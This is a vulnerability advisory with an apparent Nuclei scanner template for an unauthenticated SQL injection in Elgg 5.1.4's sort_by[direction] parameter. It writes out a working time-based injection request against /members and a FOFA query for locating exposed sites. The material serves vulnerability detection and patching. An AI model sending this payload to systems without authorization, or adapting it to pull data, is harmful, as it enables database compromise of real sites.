Elgg 5.1.4 version has a SQL Injection vulnerability in the sort_by[direction] parameter. This vulnerability allows an unauthenticated attacker to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.
PoC代码[已公开]
id: elgg-sqli
info:
name: Elgg 5.1.4 - SQL Injection
author: s4e-io
severity: high
description: |
Elgg 5.1.4 version has a SQL Injection vulnerability in the sort_by[direction] parameter. This vulnerability allows an unauthenticated attacker to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.
reference:
- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
- https://github.com/Elgg/Elgg
metadata:
verified: true
max-request: 1
vendor: elgg
product: elgg
fofa-query: icon_hash="413602919"
tags: elgg,sqli,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"elgg.js")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
@timeout 20s
GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'contains(body,"All members")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100aa3a622eeda786ee700eb329e21cd7343b64c0a304d5f14f03b894dbf53db4200220524751719c1f78f05e04dd7585d938ac76f3a175f36e3dd29a82fca43fa49deb:922c64590222798bb761d5b6d8e72950